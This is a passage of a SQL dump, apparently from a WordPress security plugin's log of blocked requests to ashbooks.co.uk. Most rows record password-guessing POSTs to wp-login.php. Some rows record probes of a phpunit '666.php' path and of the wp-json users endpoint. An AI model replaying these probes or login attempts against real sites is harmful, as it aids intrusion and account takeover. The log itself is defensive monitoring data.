(KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','unIBmRVZAOiM3E2wcHWXk806',0,1636722105.5870,476,'','POST',403,0,600,0,1,'',0),('54.163.195.110',916702062,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','v4jFueCoUrBtcSJaxV8X3iD0',0,1636722596.4590,1194,'','POST',403,0,600,0,1,'',0),('89.238.223.38',1508826918,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','b2mYVBxo5UdQseTH0lMCcqKv',0,1636723175.0348,480,'','POST',403,0,600,0,1,'',0),('206.189.23.28',3468498716,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','xXpEyd5MZKOuieLYFRSHvc74',0,1636723977.0384,496,'','POST',403,0,600,0,1,'',0),('64.111.126.32',1081048608,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','qvW0nJYCFmgjfLthxyITakcH',0,1636724966.6496,524,'','POST',403,0,600,0,1,'',0),('3.83.32.182',55779510,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php','','{\"1\":\"python-requests\\/2.26.0\"}','0IyuncoHhRfgCLa2ZSWbj537',0,1636726209.6013,408,'','GET',403,0,700,0,1,'',0),('3.83.32.182',55779510,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php','','{\"1\":\"python-requests\\/2.26.0\"}','5zQwqtkdSBc3eM6sD7Uh0WPf',0,1636726210.5385,413,'','GET',403,0,700,0,1,'',0),('3.83.32.182',55779510,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php','','{\"1\":\"python-requests\\/2.26.0\"}','Q2HNfx4vuJqSTZD38kb1OzER',0,1636726211.4574,396,'','GET',403,0,700,0,1,'',0),('3.83.32.182',55779510,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/666.php','','{\"1\":\"python-requests\\/2.26.0\"}','90NYvtol5w1TjrMshWXA6yqI',0,1636726212.3405,643,'','GET',403,0,700,0,1,'',0),('67.205.12.218',1137511642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','mIEcM5S6iWO19VfXNaAZKQCb',0,1636729505.4230,536,'','POST',403,0,600,0,1,'',0),('143.198.179.234',2412164074,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','zNoYgwuLBT92RPZ5xdvEWI8e',0,1636734544.0813,639,'','POST',403,0,600,0,1,'',0),('206.189.6.60',3468494396,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','ixCsjv7waEczNrYT6LFIp1eU',0,1636735620.5691,799,'','POST',403,0,600,0,1,'',0),('104.154.85.100',1754944868,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','sXP56ptfEWaUYnO8DizvTujL',0,1636736344.6077,519,'','POST',403,0,600,0,1,'',0),('185.63.173.50',3107958066,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','30yJ75EBZwcreSsa4VhKIRXO',0,1636737053.2340,1125,'','POST',403,0,600,0,1,'',0),('69.163.163.120',1168352120,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','heB2DPxT7nmobjVX6vAgkcNU',0,1636737691.1228,473,'','POST',403,0,600,0,1,'',0),('81.88.52.106',1364735082,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','WhTGJHvZk0Itbs3ujdDw5RNP',0,1636738316.2400,503,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','5lrvVgTSR0skXh6LnjifIHbz',0,1636739714.5076,617,'','POST',403,0,600,0,1,'',0),('89.238.223.38',1508826918,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','cltgeNAmdSDLCa5vbP9W7nk6',0,1636740402.4522,487,'','POST',403,0,600,0,1,'',0),('69.163.224.119',1168367735,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','Rkno6rDUNQIcVqF5OSu3pTWi',0,1636741073.8124,489,'','POST',403,0,600,0,1,'',0),('34.129.89.239',578902511,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','K1hTAa5V73cEonRNWsOUlpqS',0,1636741738.3943,515,'','POST',403,0,600,0,1,'',0),('46.63.80.162',775901346,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','Zj6T2GOVEIqMkin3PWlrF9xo',0,1636742420.1885,490,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','V5uYCf8wlxkSTJzZcWgXb0UF',0,1636743234.4809,666,'','POST',403,0,600,0,1,'',0),('220.132.196.5',3699688453,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','jVGp07u3Br89R1kcfd6ACiyz',0,1636743993.1613,775,'','POST',403,0,600,0,1,'',0),('162.144.126.104',2727378536,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','EyUxO4sTaYdieuPAG7IlkZnV',0,1636744738.2180,481,'','POST',403,0,600,0,1,'',0),('103.28.37.180',1729897908,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','fWC02tHYeO18ib5vjM9sGPVu',0,1636746168.0335,496,'','POST',403,0,600,0,1,'',0),('47.242.19.52',804393780,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','sGPRjxQOoDqtpKT0WgrmLXhv',0,1636746858.7539,486,'','POST',403,0,600,0,1,'',0),('107.180.73.192',1806977472,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ZLGwHNIzhmYid5CTVSp4Agcl',0,1636747542.2380,463,'','POST',403,0,600,0,1,'',0),('195.201.42.236',3284740844,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','KWglzRbik53YDJx7NFSjXVC4',0,1636748222.5326,503,'','POST',403,0,600,0,1,'',0),('156.38.216.210',2619791570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','OUcqnD7GfEBjoyg5bFhp6JmX',0,1636748899.4528,489,'','POST',403,0,600,0,1,'',0),('187.51.127.28',3140714268,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','Da5pgiWYhcn287HF4mIodErV',0,1636749571.1444,760,'','POST',403,0,600,0,1,'',0),('45.120.69.121',762856825,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','zW8JV67PALxgbZnjf3BCOHMp',0,1636750214.0712,426,'','POST',403,0,600,0,1,'',0),('195.201.7.148',3284731796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','Uv37uc04MnpBgEaosGdkyh9r',0,1636750899.1556,507,'','POST',403,0,600,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','JN4RLDPldU2vzZuHVj0mrfQb',0,1636751524.2692,797,'','POST',403,0,600,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','0JcrPYkOMiFpwvGjxsBq4TfI',0,1636752138.9638,465,'','POST',403,0,600,0,1,'',0),('195.201.42.236',3284740844,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','ZbsVmapW3JnSLXK5l2NG4zfu',0,1636753912.0995,626,'','POST',403,0,600,0,1,'',0),('116.203.150.71',1959499335,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','cQstbleBgDPmwWxY186Rqdpv',0,1636754468.8317,496,'','POST',403,0,600,0,1,'',0),('158.69.63.179',2655338419,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','QxuDSHgEvKahekolf4msILqj',0,1636755033.1857,511,'','POST',403,0,600,0,1,'',0),('89.238.223.38',1508826918,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','nt8KfD2QyidE09p4THuvcXzk',0,1636755621.4667,471,'','POST',403,0,600,0,1,'',0),('176.61.146.49',2956825137,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','ob1U9YWirwNlB52xjnG7AThO',0,1636756155.0602,1148,'','POST',403,0,600,0,1,'',0),('13.94.249.188',224328124,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','afkVec3QNhWp1ZGCiszoMxgD',0,1636756718.0335,901,'','POST',403,0,600,0,1,'',0),('176.61.146.49',2956825137,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','LhVrb8QM0WvEwAURfC4dSZpK',0,1636757296.1021,1377,'','POST',403,0,600,0,1,'',0),('23.94.120.151',392067223,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','B2avsVSTjI5C1kW4Xgo6Ndze',0,1636757891.3385,1114,'','POST',403,0,600,0,1,'',0),('81.88.52.163',1364735139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','vjIpA9itrELbeMgRXVfTkGBZ',0,1636758535.8494,411,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','n2bW1DMHmVPNTl7Fszg30epj',0,1636759200.6334,530,'','POST',403,0,600,0,1,'',0),('35.175.221.160',598728096,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','ni8SLvChtEA0VT2xNc1OpMUR',0,1636759851.6215,468,'','POST',403,0,600,0,1,'',0),('72.167.53.106',1218917738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','w3UV4hcW0ykERH6CjmdDufJN',0,1636761123.9278,732,'','POST',403,0,600,0,1,'',0),('128.199.230.82',2160584274,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','p4yEQ6vVxkjYoeTKPDmXLJ2B',0,1636761824.8863,572,'','POST',403,0,600,0,1,'',0),('72.14.176.248',1208922360,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','gwoWLuR0XmF4qEIVdQMeTOly',0,1636762488.7031,456,'','POST',403,0,600,0,1,'',0),('3.9.154.222',50961118,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','K9UTRwWdYzvuEtiMHkDpSrqy',0,1636763189.2132,684,'','POST',403,0,600,0,1,'',0),('195.201.7.148',3284731796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','UipFdb1kIjgx69GHReJYlBvZ',0,1636763877.2721,477,'','POST',403,0,600,0,1,'',0),('95.216.221.91',1608047963,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','LDYnw1c4uHZ3vkqFh7pIeSbj',0,1636764556.7601,249,'','POST',403,0,600,0,1,'',0),('107.172.219.253',1806490621,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','tYgmNzs6ku9UWSPcJXje1Epq',0,1636765236.8943,452,'','POST',403,0,600,0,1,'',0),('84.112.89.42',1416649002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','KpaMs52fZ6to4q8xLNGmgi03',0,1636765924.8613,478,'','POST',403,0,600,0,1,'',0),('74.208.34.142',1255154318,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Z97wPRpWDyIVFH3ziafrqu5h',0,1636766651.4111,487,'','POST',403,0,600,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','Uk20NHQSJetOcgXWIrGYn8Bx',0,1636767030.4050,1784,'','GET',403,0,520,0,1,'',0),('194.233.72.23',3270068247,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','RiCuYXDAz6qZQVtESGLlgrwj',0,1636767554.4462,1505,'','POST',403,0,600,0,1,'',0),('169.60.78.94',2839301726,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','3z5KruDkbV1ihB4ANQmUev6p',0,1636769638.0952,536,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','kGMtxv57WK4dyzQHTYc9Z0N3',0,1636770861.7826,530,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','lbkSA4aPRuCtXdWZhKHY7m6g',0,1636772044.2348,759,'','POST',403,0,600,0,1,'',0),('81.88.52.26',1364735002,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','1HOEDlNL76WvcYPRj3wuFh4n',0,1636773201.2882,515,'','POST',403,0,600,0,1,'',0),('177.55.111.11',2973200139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','LOtoZJ3xqU1vwBsHnP2jGXly',0,1636774370.0496,698,'','POST',403,0,600,0,1,'',0),('157.245.110.251',2650107643,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','3keGEWZPMO0Y48mCshyuBSXQ',0,1636777387.0115,570,'','POST',403,0,600,0,1,'',0),('136.144.210.23',2291192343,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','dhfkAXQDsMxg6ol1P0yEwVFO',0,1636777897.5164,1383,'','POST',403,0,600,0,1,'',0),('78.47.116.216',1311732952,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','XqeLagDTnlMprHEdJtUOIzvi',0,1636778407.1984,721,'','POST',403,0,600,0,1,'',0),('45.40.166.143',757638799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','HQ4OqemNE5VvDkiSJwtRWaz9',0,1636778912.1106,472,'','POST',403,0,600,0,1,'',0),('212.51.178.42',3560157738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','xoZaF5JWkUMs68ITSrplctev',0,1636790911.4599,800,'','POST',403,0,600,0,1,'',0),('185.2.4.44',3103917100,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','dVzbg1EkpclF0jvhPC475rsX',0,1636792108.6409,612,'','POST',403,0,600,0,1,'',0),('95.111.197.125',1601160573,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','eAJK23UCxbmz70dWpnhjBwPL',0,1636792729.7465,615,'','POST',403,0,600,0,1,'',0),('87.106.169.145',1466608017,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','BetLw5E3bMINfFQ6OC1q8YyT',0,1636793392.5974,558,'','POST',403,0,600,0,1,'',0),('118.27.30.151',1981488791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','SYpI3OH0bi9w5QGLjJ2Dydum',0,1636794040.2927,1099,'','POST',403,0,600,0,1,'',0),('190.45.171.165',3190664101,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','jZf6KLsiyOnzC0YdBaRpr48e',0,1636794656.7891,743,'','POST',403,0,600,0,1,'',0),('74.208.34.142',1255154318,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','Q6zX2YlgR09Oue1yWSxp4jP8',0,1636795280.0188,801,'','POST',403,0,600,0,1,'',0),('18.196.46.253',314846973,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','LKCvOVBDtA5rPjIlQTYE9q3n',0,1636795929.4865,842,'','POST',403,0,600,0,1,'',0),('37.139.13.163',629869987,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ZDq56ozl3BVLtrQ2P0v7IbjK',0,1636796589.9668,489,'','POST',403,0,600,0,1,'',0),('34.129.89.239',578902511,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','aU4JR6H3hvcs1lVmfuytGC8p',0,1636797236.4865,592,'','POST',403,0,600,0,1,'',0),('185.50.199.194',3107112898,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','EFApL3WTSosQxhuDRmcKeXNr',0,1636798691.1108,599,'','POST',403,0,600,0,1,'',0),('2.56.59.242',37239794,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','JiEe15wnbDFqXBlmhzIdx9Oj',0,1636800758.0905,1321,'','GET',403,0,520,0,1,'',0),('67.205.11.6',1137511174,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','w4SzV1ytDUkPXOHTQvNhc7KY',0,1636802867.6497,721,'','POST',403,0,600,0,1,'',0),('104.248.233.244',1761143284,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','dcOuyeMR0VpBhTvGwUq78boD',0,1636803668.7263,643,'','POST',403,0,600,0,1,'',0),('93.115.79.153',1567838105,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','nuakQKfoyibtB89EvSsCj2W7',0,1636806082.0432,502,'','POST',403,0,600,0,1,'',0),('138.68.248.47',2319775791,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','Ck2sDm0AunPRZoecBTEfavgd',0,1636806931.2256,474,'','POST',403,0,600,0,1,'',0),('54.163.195.110',916702062,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','iI7GLmfrTjVY0wHkBOAQo4Uv',0,1636807773.6195,670,'','POST',403,0,600,0,1,'',0),('93.115.79.153',1567838105,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 